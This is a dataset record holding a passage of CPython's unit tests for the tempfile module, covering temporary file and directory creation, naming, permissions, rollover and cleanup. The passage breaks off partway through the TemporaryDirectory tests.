blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7d8f662b47b19b1207a866a5facfa1516f5aeb8 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/test/test_tempfile.py | cf2ae080bed9269d4cb4c40d27e964fefb779988 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 41,583 | py | # tempfile.py unit tests.
import tempfile
import errno
import io
import os
import signal
import sys
import re
import warnings
import contextlib
import weakref
import unittest
from test import support, script_helper
if hasattr(os, 'stat'):
import stat
has_stat = 1
else:
has_stat = 0
has_textmode = (tempfile._text_openflags != tempfile._bin_openflags)
has_spawnl = hasattr(os, 'spawnl')
# TEST_FILES may need to be tweaked for systems depending on the maximum
# number of files that can be opened at one time (see ulimit -n)
if sys.platform.startswith('openbsd'):
TEST_FILES = 48
else:
TEST_FILES = 100
# This is organized as one test for each chunk of code in tempfile.py,
# in order of their appearance in the file. Testing which requires
# threads is not done here.
# Common functionality.
class BaseTestCase(unittest.TestCase):
str_check = re.compile(r"^[a-z0-9_-]{8}$")
def setUp(self):
self._warnings_manager = support.check_warnings()
self._warnings_manager.__enter__()
warnings.filterwarnings("ignore", category=RuntimeWarning,
message="mktemp", module=__name__)
def tearDown(self):
self._warnings_manager.__exit__(None, None, None)
def nameCheck(self, name, dir, pre, suf):
(ndir, nbase) = os.path.split(name)
npre = nbase[:len(pre)]
nsuf = nbase[len(nbase)-len(suf):]
# check for equality of the absolute paths!
self.assertEqual(os.path.abspath(ndir), os.path.abspath(dir),
"file '%s' not in directory '%s'" % (name, dir))
self.assertEqual(npre, pre,
"file '%s' does not begin with '%s'" % (nbase, pre))
self.assertEqual(nsuf, suf,
"file '%s' does not end with '%s'" % (nbase, suf))
nbase = nbase[len(pre):len(nbase)-len(suf)]
self.assertTrue(self.str_check.match(nbase),
"random string '%s' does not match ^[a-z0-9_-]{8}$"
% nbase)
class TestExports(BaseTestCase):
def test_exports(self):
# There are no surprising symbols in the tempfile module
dict = tempfile.__dict__
expected = {
"NamedTemporaryFile" : 1,
"TemporaryFile" : 1,
"mkstemp" : 1,
"mkdtemp" : 1,
"mktemp" : 1,
"TMP_MAX" : 1,
"gettempprefix" : 1,
"gettempdir" : 1,
"tempdir" : 1,
"template" : 1,
"SpooledTemporaryFile" : 1,
"TemporaryDirectory" : 1,
}
unexp = []
for key in dict:
if key[0] != '_' and key not in expected:
unexp.append(key)
self.assertTrue(len(unexp) == 0,
"unexpected keys: %s" % unexp)
class TestRandomNameSequence(BaseTestCase):
"""Test the internal iterator object _RandomNameSequence."""
def setUp(self):
self.r = tempfile._RandomNameSequence()
super().setUp()
def test_get_six_char_str(self):
# _RandomNameSequence returns a six-character string
s = next(self.r)
self.nameCheck(s, '', '', '')
def test_many(self):
# _RandomNameSequence returns no duplicate strings (stochastic)
dict = {}
r = self.r
for i in range(TEST_FILES):
s = next(r)
self.nameCheck(s, '', '', '')
self.assertNotIn(s, dict)
dict[s] = 1
def supports_iter(self):
# _RandomNameSequence supports the iterator protocol
i = 0
r = self.r
for s in r:
i += 1
if i == 20:
break
@unittest.skipUnless(hasattr(os, 'fork'),
"os.fork is required for this test")
def test_process_awareness(self):
# ensure that the random source differs between
# child and parent.
read_fd, write_fd = os.pipe()
pid = None
try:
pid = os.fork()
if not pid:
os.close(read_fd)
os.write(write_fd, next(self.r).encode("ascii"))
os.close(write_fd)
# bypass the normal exit handlers- leave those to
# the parent.
os._exit(0)
parent_value = next(self.r)
child_value = os.read(read_fd, len(parent_value)).decode("ascii")
finally:
if pid:
# best effort to ensure the process can't bleed out
# via any bugs above
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
os.close(read_fd)
os.close(write_fd)
self.assertNotEqual(child_value, parent_value)
class TestCandidateTempdirList(BaseTestCase):
"""Test the internal function _candidate_tempdir_list."""
def test_nonempty_list(self):
# _candidate_tempdir_list returns a nonempty list of strings
cand = tempfile._candidate_tempdir_list()
self.assertFalse(len(cand) == 0)
for c in cand:
self.assertIsInstance(c, str)
def test_wanted_dirs(self):
# _candidate_tempdir_list contains the expected directories
# Make sure the interesting environment variables are all set.
with support.EnvironmentVarGuard() as env:
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = os.getenv(envname)
if not dirname:
env[envname] = os.path.abspath(envname)
cand = tempfile._candidate_tempdir_list()
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = os.getenv(envname)
if not dirname: raise ValueError
self.assertIn(dirname, cand)
try:
dirname = os.getcwd()
except (AttributeError, OSError):
dirname = os.curdir
self.assertIn(dirname, cand)
# Not practical to try to verify the presence of OS-specific
# paths in this list.
# We test _get_default_tempdir some more by testing gettempdir.
class TestGetDefaultTempdir(BaseTestCase):
"""Test _get_default_tempdir()."""
def test_no_files_left_behind(self):
# use a private empty directory
with tempfile.TemporaryDirectory() as our_temp_directory:
# force _get_default_tempdir() to consider our empty directory
def our_candidate_list():
return [our_temp_directory]
with support.swap_attr(tempfile, "_candidate_tempdir_list",
our_candidate_list):
# verify our directory is empty after _get_default_tempdir()
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
def raise_OSError(*args, **kwargs):
raise OSError()
with support.swap_attr(io, "open", raise_OSError):
# test again with failing io.open()
with self.assertRaises(FileNotFoundError):
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
open = io.open
def bad_writer(*args, **kwargs):
fp = open(*args, **kwargs)
fp.write = raise_OSError
return fp
with support.swap_attr(io, "open", bad_writer):
# test again with failing write()
with self.assertRaises(FileNotFoundError):
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
class TestGetCandidateNames(BaseTestCase):
"""Test the internal function _get_candidate_names."""
def test_retval(self):
# _get_candidate_names returns a _RandomNameSequence object
obj = tempfile._get_candidate_names()
self.assertIsInstance(obj, tempfile._RandomNameSequence)
def test_same_thing(self):
# _get_candidate_names always returns the same object
a = tempfile._get_candidate_names()
b = tempfile._get_candidate_names()
self.assertTrue(a is b)
@contextlib.contextmanager
def _inside_empty_temp_dir():
dir = tempfile.mkdtemp()
try:
with support.swap_attr(tempfile, 'tempdir', dir):
yield
finally:
support.rmtree(dir)
def _mock_candidate_names(*names):
return support.swap_attr(tempfile,
'_get_candidate_names',
lambda: iter(names))
class TestMkstempInner(BaseTestCase):
"""Test the internal function _mkstemp_inner."""
class mkstemped:
_bflags = tempfile._bin_openflags
_tflags = tempfile._text_openflags
_close = os.close
_unlink = os.unlink
def __init__(self, dir, pre, suf, bin):
if bin: flags = self._bflags
else: flags = self._tflags
(self.fd, self.name) = tempfile._mkstemp_inner(dir, pre, suf, flags)
def write(self, str):
os.write(self.fd, str)
def __del__(self):
self._close(self.fd)
self._unlink(self.name)
def do_create(self, dir=None, pre="", suf="", bin=1):
if dir is None:
dir = tempfile.gettempdir()
file = self.mkstemped(dir, pre, suf, bin)
self.nameCheck(file.name, dir, pre, suf)
return file
def test_basic(self):
# _mkstemp_inner can create files
self.do_create().write(b"blat")
self.do_create(pre="a").write(b"blat")
self.do_create(suf="b").write(b"blat")
self.do_create(pre="a", suf="b").write(b"blat")
self.do_create(pre="aa", suf=".txt").write(b"blat")
def test_basic_many(self):
# _mkstemp_inner can create many files (stochastic)
extant = list(range(TEST_FILES))
for i in extant:
extant[i] = self.do_create(pre="aa")
def test_choose_directory(self):
# _mkstemp_inner can create files in a user-selected directory
dir = tempfile.mkdtemp()
try:
self.do_create(dir=dir).write(b"blat")
finally:
os.rmdir(dir)
@unittest.skipUnless(has_stat, 'os.stat not available')
def test_file_mode(self):
# _mkstemp_inner creates files with the proper mode
file = self.do_create()
mode = stat.S_IMODE(os.stat(file.name).st_mode)
expected = 0o600
if sys.platform == 'win32':
# There's no distinction among 'user', 'group' and 'world';
# replicate the 'user' bits.
user = expected >> 6
expected = user * (1 + 8 + 64)
self.assertEqual(mode, expected)
@unittest.skipUnless(has_spawnl, 'os.spawnl not available')
def test_noinherit(self):
# _mkstemp_inner file handles are not inherited by child processes
if support.verbose:
v="v"
else:
v="q"
file = self.do_create()
self.assertEqual(os.get_inheritable(file.fd), False)
fd = "%d" % file.fd
try:
me = __file__
except NameError:
me = sys.argv[0]
# We have to exec something, so that FD_CLOEXEC will take
# effect. The core of this test is therefore in
# tf_inherit_check.py, which see.
tester = os.path.join(os.path.dirname(os.path.abspath(me)),
"tf_inherit_check.py")
# On Windows a spawn* /path/ with embedded spaces shouldn't be quoted,
# but an arg with embedded spaces should be decorated with double
# quotes on each end
if sys.platform == 'win32':
decorated = '"%s"' % sys.executable
tester = '"%s"' % tester
else:
decorated = sys.executable
retval = os.spawnl(os.P_WAIT, sys.executable, decorated, tester, v, fd)
self.assertFalse(retval < 0,
"child process caught fatal signal %d" % -retval)
self.assertFalse(retval > 0, "child process reports failure %d"%retval)
@unittest.skipUnless(has_textmode, "text mode not available")
def test_textmode(self):
# _mkstemp_inner can create files in text mode
# A text file is truncated at the first Ctrl+Z byte
f = self.do_create(bin=0)
f.write(b"blat\x1a")
f.write(b"extra\n")
os.lseek(f.fd, 0, os.SEEK_SET)
self.assertEqual(os.read(f.fd, 20), b"blat")
def default_mkstemp_inner(self):
return tempfile._mkstemp_inner(tempfile.gettempdir(),
tempfile.template,
'',
tempfile._bin_openflags)
def test_collision_with_existing_file(self):
# _mkstemp_inner tries another name when a file with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
(fd1, name1) = self.default_mkstemp_inner()
os.close(fd1)
self.assertTrue(name1.endswith('aaa'))
(fd2, name2) = self.default_mkstemp_inner()
os.close(fd2)
self.assertTrue(name2.endswith('bbb'))
def test_collision_with_existing_directory(self):
# _mkstemp_inner tries another name when a directory with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
dir = tempfile.mkdtemp()
self.assertTrue(dir.endswith('aaa'))
(fd, name) = self.default_mkstemp_inner()
os.close(fd)
self.assertTrue(name.endswith('bbb'))
class TestGetTempPrefix(BaseTestCase):
"""Test gettempprefix()."""
def test_sane_template(self):
# gettempprefix returns a nonempty prefix string
p = tempfile.gettempprefix()
self.assertIsInstance(p, str)
self.assertTrue(len(p) > 0)
def test_usable_template(self):
# gettempprefix returns a usable prefix string
# Create a temp directory, avoiding use of the prefix.
# Then attempt to create a file whose name is
# prefix + 'xxxxxx.xxx' in that directory.
p = tempfile.gettempprefix() + "xxxxxx.xxx"
d = tempfile.mkdtemp(prefix="")
try:
p = os.path.join(d, p)
fd = os.open(p, os.O_RDWR | os.O_CREAT)
os.close(fd)
os.unlink(p)
finally:
os.rmdir(d)
class TestGetTempDir(BaseTestCase):
"""Test gettempdir()."""
def test_directory_exists(self):
# gettempdir returns a directory which exists
dir = tempfile.gettempdir()
self.assertTrue(os.path.isabs(dir) or dir == os.curdir,
"%s is not an absolute path" % dir)
self.assertTrue(os.path.isdir(dir),
"%s is not a directory" % dir)
def test_directory_writable(self):
# gettempdir returns a directory writable by the user
# sneaky: just instantiate a NamedTemporaryFile, which
# defaults to writing into the directory returned by
# gettempdir.
file = tempfile.NamedTemporaryFile()
file.write(b"blat")
file.close()
def test_same_thing(self):
# gettempdir always returns the same object
a = tempfile.gettempdir()
b = tempfile.gettempdir()
self.assertTrue(a is b)
def test_case_sensitive(self):
# gettempdir should not flatten its case
# even on a case-insensitive file system
case_sensitive_tempdir = tempfile.mkdtemp("-Temp")
_tempdir, tempfile.tempdir = tempfile.tempdir, None
try:
with support.EnvironmentVarGuard() as env:
# Fake the first env var which is checked as a candidate
env["TMPDIR"] = case_sensitive_tempdir
self.assertEqual(tempfile.gettempdir(), case_sensitive_tempdir)
finally:
tempfile.tempdir = _tempdir
support.rmdir(case_sensitive_tempdir)
class TestMkstemp(BaseTestCase):
"""Test mkstemp()."""
def do_create(self, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
(fd, name) = tempfile.mkstemp(dir=dir, prefix=pre, suffix=suf)
(ndir, nbase) = os.path.split(name)
adir = os.path.abspath(dir)
self.assertEqual(adir, ndir,
"Directory '%s' incorrectly returned as '%s'" % (adir, ndir))
try:
self.nameCheck(name, dir, pre, suf)
finally:
os.close(fd)
os.unlink(name)
def test_basic(self):
# mkstemp can create files
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
self.do_create(dir=".")
def test_choose_directory(self):
# mkstemp can create directories in a user-selected directory
dir = tempfile.mkdtemp()
try:
self.do_create(dir=dir)
finally:
os.rmdir(dir)
class TestMkdtemp(BaseTestCase):
"""Test mkdtemp()."""
def do_create(self, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
name = tempfile.mkdtemp(dir=dir, prefix=pre, suffix=suf)
try:
self.nameCheck(name, dir, pre, suf)
return name
except:
os.rmdir(name)
raise
def test_basic(self):
# mkdtemp can create directories
os.rmdir(self.do_create())
os.rmdir(self.do_create(pre="a"))
os.rmdir(self.do_create(suf="b"))
os.rmdir(self.do_create(pre="a", suf="b"))
os.rmdir(self.do_create(pre="aa", suf=".txt"))
def test_basic_many(self):
# mkdtemp can create many directories (stochastic)
extant = list(range(TEST_FILES))
try:
for i in extant:
extant[i] = self.do_create(pre="aa")
finally:
for i in extant:
if(isinstance(i, str)):
os.rmdir(i)
def test_choose_directory(self):
# mkdtemp can create directories in a user-selected directory
dir = tempfile.mkdtemp()
try:
os.rmdir(self.do_create(dir=dir))
finally:
os.rmdir(dir)
@unittest.skipUnless(has_stat, 'os.stat not available')
def test_mode(self):
# mkdtemp creates directories with the proper mode
dir = self.do_create()
try:
mode = stat.S_IMODE(os.stat(dir).st_mode)
mode &= 0o777 # Mask off sticky bits inherited from /tmp
expected = 0o700
if sys.platform == 'win32':
# There's no distinction among 'user', 'group' and 'world';
# replicate the 'user' bits.
user = expected >> 6
expected = user * (1 + 8 + 64)
self.assertEqual(mode, expected)
finally:
os.rmdir(dir)
def test_collision_with_existing_file(self):
# mkdtemp tries another name when a file with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
file = tempfile.NamedTemporaryFile(delete=False)
file.close()
self.assertTrue(file.name.endswith('aaa'))
dir = tempfile.mkdtemp()
self.assertTrue(dir.endswith('bbb'))
def test_collision_with_existing_directory(self):
# mkdtemp tries another name when a directory with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
dir1 = tempfile.mkdtemp()
self.assertTrue(dir1.endswith('aaa'))
dir2 = tempfile.mkdtemp()
self.assertTrue(dir2.endswith('bbb'))
class TestMktemp(BaseTestCase):
"""Test mktemp()."""
# For safety, all use of mktemp must occur in a private directory.
# We must also suppress the RuntimeWarning it generates.
def setUp(self):
self.dir = tempfile.mkdtemp()
super().setUp()
def tearDown(self):
if self.dir:
os.rmdir(self.dir)
self.dir = None
super().tearDown()
class mktemped:
_unlink = os.unlink
_bflags = tempfile._bin_openflags
def __init__(self, dir, pre, suf):
self.name = tempfile.mktemp(dir=dir, prefix=pre, suffix=suf)
# Create the file. This will raise an exception if it's
# mysteriously appeared in the meanwhile.
os.close(os.open(self.name, self._bflags, 0o600))
def __del__(self):
self._unlink(self.name)
def do_create(self, pre="", suf=""):
file = self.mktemped(self.dir, pre, suf)
self.nameCheck(file.name, self.dir, pre, suf)
return file
def test_basic(self):
# mktemp can choose usable file names
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
def test_many(self):
# mktemp can choose many usable file names (stochastic)
extant = list(range(TEST_FILES))
for i in extant:
extant[i] = self.do_create(pre="aa")
## def test_warning(self):
## # mktemp issues a warning when used
## warnings.filterwarnings("error",
## category=RuntimeWarning,
## message="mktemp")
## self.assertRaises(RuntimeWarning,
## tempfile.mktemp, dir=self.dir)
# We test _TemporaryFileWrapper by testing NamedTemporaryFile.
class TestNamedTemporaryFile(BaseTestCase):
"""Test NamedTemporaryFile()."""
def do_create(self, dir=None, pre="", suf="", delete=True):
if dir is None:
dir = tempfile.gettempdir()
file = tempfile.NamedTemporaryFile(dir=dir, prefix=pre, suffix=suf,
delete=delete)
self.nameCheck(file.name, dir, pre, suf)
return file
def test_basic(self):
# NamedTemporaryFile can create files
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
def test_method_lookup(self):
# Issue #18879: Looking up a temporary file method should keep it
# alive long enough.
f = self.do_create()
wr = weakref.ref(f)
write = f.write
write2 = f.write
del f
write(b'foo')
del write
write2(b'bar')
del write2
if support.check_impl_detail(cpython=True):
# No reference cycle was created.
self.assertIsNone(wr())
def test_creates_named(self):
# NamedTemporaryFile creates files with names
f = tempfile.NamedTemporaryFile()
self.assertTrue(os.path.exists(f.name),
"NamedTemporaryFile %s does not exist" % f.name)
def test_del_on_close(self):
# A NamedTemporaryFile is deleted when closed
dir = tempfile.mkdtemp()
try:
f = tempfile.NamedTemporaryFile(dir=dir)
f.write(b'blat')
f.close()
self.assertFalse(os.path.exists(f.name),
"NamedTemporaryFile %s exists after close" % f.name)
finally:
os.rmdir(dir)
def test_dis_del_on_close(self):
# Tests that delete-on-close can be disabled
dir = tempfile.mkdtemp()
tmp = None
try:
f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
tmp = f.name
f.write(b'blat')
f.close()
self.assertTrue(os.path.exists(f.name),
"NamedTemporaryFile %s missing after close" % f.name)
finally:
if tmp is not None:
os.unlink(tmp)
os.rmdir(dir)
def test_multiple_close(self):
# A NamedTemporaryFile can be closed many times without error
f = tempfile.NamedTemporaryFile()
f.write(b'abc\n')
f.close()
f.close()
f.close()
def test_context_manager(self):
# A NamedTemporaryFile can be used as a context manager
with tempfile.NamedTemporaryFile() as f:
self.assertTrue(os.path.exists(f.name))
self.assertFalse(os.path.exists(f.name))
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
# How to test the mode and bufsize parameters?
class TestSpooledTemporaryFile(BaseTestCase):
"""Test SpooledTemporaryFile()."""
def do_create(self, max_size=0, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
file = tempfile.SpooledTemporaryFile(max_size=max_size, dir=dir, prefix=pre, suffix=suf)
return file
def test_basic(self):
# SpooledTemporaryFile can create files
f = self.do_create()
self.assertFalse(f._rolled)
f = self.do_create(max_size=100, pre="a", suf=".txt")
self.assertFalse(f._rolled)
def test_del_on_close(self):
# A SpooledTemporaryFile is deleted when closed
dir = tempfile.mkdtemp()
try:
f = tempfile.SpooledTemporaryFile(max_size=10, dir=dir)
self.assertFalse(f._rolled)
f.write(b'blat ' * 5)
self.assertTrue(f._rolled)
filename = f.name
f.close()
self.assertFalse(isinstance(filename, str) and os.path.exists(filename),
"SpooledTemporaryFile %s exists after close" % filename)
finally:
os.rmdir(dir)
def test_rewrite_small(self):
# A SpooledTemporaryFile can be written to multiple within the max_size
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
for i in range(5):
f.seek(0, 0)
f.write(b'x' * 20)
self.assertFalse(f._rolled)
def test_write_sequential(self):
# A SpooledTemporaryFile should hold exactly max_size bytes, and roll
# over afterward
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
f.write(b'x' * 20)
self.assertFalse(f._rolled)
f.write(b'x' * 10)
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_writelines(self):
# Verify writelines with a SpooledTemporaryFile
f = self.do_create()
f.writelines((b'x', b'y', b'z'))
f.seek(0)
buf = f.read()
self.assertEqual(buf, b'xyz')
def test_writelines_sequential(self):
# A SpooledTemporaryFile should hold exactly max_size bytes, and roll
# over afterward
f = self.do_create(max_size=35)
f.writelines((b'x' * 20, b'x' * 10, b'x' * 5))
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_sparse(self):
# A SpooledTemporaryFile that is written late in the file will extend
# when that occurs
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
f.seek(100, 0)
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_fileno(self):
# A SpooledTemporaryFile should roll over to a real file on fileno()
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
self.assertTrue(f.fileno() > 0)
self.assertTrue(f._rolled)
def test_multiple_close_before_rollover(self):
# A SpooledTemporaryFile can be closed many times without error
f = tempfile.SpooledTemporaryFile()
f.write(b'abc\n')
self.assertFalse(f._rolled)
f.close()
f.close()
f.close()
def test_multiple_close_after_rollover(self):
# A SpooledTemporaryFile can be closed many times without error
f = tempfile.SpooledTemporaryFile(max_size=1)
f.write(b'abc\n')
self.assertTrue(f._rolled)
f.close()
f.close()
f.close()
def test_bound_methods(self):
# It should be OK to steal a bound method from a SpooledTemporaryFile
# and use it independently; when the file rolls over, those bound
# methods should continue to function
f = self.do_create(max_size=30)
read = f.read
write = f.write
seek = f.seek
write(b"a" * 35)
write(b"b" * 35)
seek(0, 0)
self.assertEqual(read(70), b'a'*35 + b'b'*35)
def test_properties(self):
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'x' * 10)
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+b')
self.assertIsNone(f.name)
with self.assertRaises(AttributeError):
f.newlines
with self.assertRaises(AttributeError):
f.encoding
f.write(b'x')
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'rb+')
self.assertIsNotNone(f.name)
with self.assertRaises(AttributeError):
f.newlines
with self.assertRaises(AttributeError):
f.encoding
def test_text_mode(self):
# Creating a SpooledTemporaryFile with a text mode should produce
# a file object reading and writing (Unicode) text strings.
f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10)
f.write("abc\n")
f.seek(0)
self.assertEqual(f.read(), "abc\n")
f.write("def\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\n")
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNone(f.name)
self.assertIsNone(f.newlines)
self.assertIsNone(f.encoding)
f.write("xyzzy\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\nxyzzy\n")
# Check that Ctrl+Z doesn't truncate the file
f.write("foo\x1abar\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\nxyzzy\nfoo\x1abar\n")
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNotNone(f.name)
self.assertEqual(f.newlines, os.linesep)
self.assertIsNotNone(f.encoding)
def test_text_newline_and_encoding(self):
f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10,
newline='', encoding='utf-8')
f.write("\u039B\r\n")
f.seek(0)
self.assertEqual(f.read(), "\u039B\r\n")
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNone(f.name)
self.assertIsNone(f.newlines)
self.assertIsNone(f.encoding)
f.write("\u039B" * 20 + "\r\n")
f.seek(0)
self.assertEqual(f.read(), "\u039B\r\n" + ("\u039B" * 20) + "\r\n")
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNotNone(f.name)
self.assertIsNotNone(f.newlines)
self.assertEqual(f.encoding, 'utf-8')
def test_context_manager_before_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
with tempfile.SpooledTemporaryFile(max_size=1) as f:
self.assertFalse(f._rolled)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_context_manager_during_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
with tempfile.SpooledTemporaryFile(max_size=1) as f:
self.assertFalse(f._rolled)
f.write(b'abc\n')
f.flush()
self.assertTrue(f._rolled)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_context_manager_after_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
f = tempfile.SpooledTemporaryFile(max_size=1)
f.write(b'abc\n')
f.flush()
self.assertTrue(f._rolled)
with f:
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_truncate_with_size_parameter(self):
# A SpooledTemporaryFile can be truncated to zero size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.seek(0)
f.truncate()
self.assertFalse(f._rolled)
self.assertEqual(f._file.getvalue(), b'')
# A SpooledTemporaryFile can be truncated to a specific size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.truncate(4)
self.assertFalse(f._rolled)
self.assertEqual(f._file.getvalue(), b'abcd')
# A SpooledTemporaryFile rolls over if truncated to large size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.truncate(20)
self.assertTrue(f._rolled)
if has_stat:
self.assertEqual(os.fstat(f.fileno()).st_size, 20)
if tempfile.NamedTemporaryFile is not tempfile.TemporaryFile:
class TestTemporaryFile(BaseTestCase):
"""Test TemporaryFile()."""
def test_basic(self):
# TemporaryFile can create files
# No point in testing the name params - the file has no name.
tempfile.TemporaryFile()
def test_has_no_name(self):
# TemporaryFile creates files with no names (on this system)
dir = tempfile.mkdtemp()
f = tempfile.TemporaryFile(dir=dir)
f.write(b'blat')
# Sneaky: because this file has no name, it should not prevent
# us from removing the directory it was created in.
try:
os.rmdir(dir)
except:
# cleanup
f.close()
os.rmdir(dir)
raise
def test_multiple_close(self):
# A TemporaryFile can be closed many times without error
f = tempfile.TemporaryFile()
f.write(b'abc\n')
f.close()
f.close()
f.close()
# How to test the mode and bufsize parameters?
def test_mode_and_encoding(self):
def roundtrip(input, *args, **kwargs):
with tempfile.TemporaryFile(*args, **kwargs) as fileobj:
fileobj.write(input)
fileobj.seek(0)
self.assertEqual(input, fileobj.read())
roundtrip(b"1234", "w+b")
roundtrip("abdc\n", "w+")
roundtrip("\u039B", "w+", encoding="utf-16")
roundtrip("foo\r\n", "w+", newline="")
# Helper for test_del_on_shutdown
class NulledModules:
def __init__(self, *modules):
self.refs = [mod.__dict__ for mod in modules]
self.contents = [ref.copy() for ref in self.refs]
def __enter__(self):
for d in self.refs:
for key in d:
d[key] = None
def __exit__(self, *exc_info):
for d, c in zip(self.refs, self.contents):
d.clear()
d.update(c)
class TestTemporaryDirectory(BaseTestCase):
"""Test TemporaryDirectory()."""
def do_create(self, dir=None, pre="", suf="", recurse=1):
if dir is None:
dir = tempfile.gettempdir()
tmp = tempfile.TemporaryDirectory(dir=dir, prefix=pre, suffix=suf)
self.nameCheck(tmp.name, dir, pre, suf)
# Create a subdirectory and some files
if recurse:
d1 = self.do_create(tmp.name, pre, suf, recurse-1)
d1.name = None
with open(os.path.join(tmp.name, "test.txt"), "wb") as f:
f.write(b"Hello world!")
return tmp
def test_mkdtemp_failure(self):
# Check no additional exception if mkdtemp fails
# Previously would raise AttributeError instead
# (noted as part of Issue #10188)
with tempfile.TemporaryDirectory() as nonexistent:
pass
with self.assertRaises(FileNotFoundError) as cm:
tempfile.TemporaryDirectory(dir=nonexistent)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_explicit_cleanup(self):
# A TemporaryDirectory is deleted when cleaned up
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
self.assertTrue(os.path.exists(d.name),
"TemporaryDirectory %s does not exist" % d.name)
d.cleanup()
self.assertFalse(os.path.exists(d.name),
"TemporaryDirectory %s exists after cleanup" % d.name)
finally:
os.rmdir(dir)
@support.skip_unless_symlink
def test_cleanup_with_symlink_to_a_directory(self):
# cleanup() should not follow symlinks to directories (issue #12464)
d1 = self.do_create()
d2 = self.do_create(recurse=0)
# Symlink d1/foo -> d2
os.symlink(d2.name, os.path.join(d1.name, "foo"))
# This call to cleanup() should not follow the "foo" symlink
d1.cleanup()
self.assertFalse(os.path.exists(d1.name),
"TemporaryDirectory %s exists after cleanup" % d1.name)
self.assertTrue(os.path.exists(d2.name),
"Directory pointed to by a symlink was deleted")
self.assertEqual(os.listdir(d2.name), ['test.txt'],
"Contents of the directory pointed to by a symlink "
"were deleted")
d2.cleanup()
@support.cpython_only
def test_del_on_collection(self):
